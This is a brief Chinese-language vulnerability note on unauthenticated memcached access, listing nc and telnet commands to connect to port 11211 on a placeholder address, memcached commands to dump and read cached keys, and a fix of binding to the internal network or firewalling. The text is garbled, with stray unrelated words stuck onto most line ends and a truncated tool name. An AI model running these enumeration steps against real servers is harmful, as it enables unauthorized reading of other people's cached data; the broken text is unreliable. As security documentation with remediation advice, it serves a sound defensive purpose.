memcached未受權memcached
漏洞成因:spa
Memcached端口是對外開放的,用nc或Telne能夠直接登陸,查看信息,增長修改均可以。get
nc -vv 1.2.3.4 11211it
telnet 1.2.3.4 11211class
驗證讀取key:登錄
stats配置
stats items防火牆
stats cachedump 22 0margin
get kkkkkkkkkkkk端口
修復建議:
memcached設置監聽內網或配置防火牆限制非必要的遠程訪問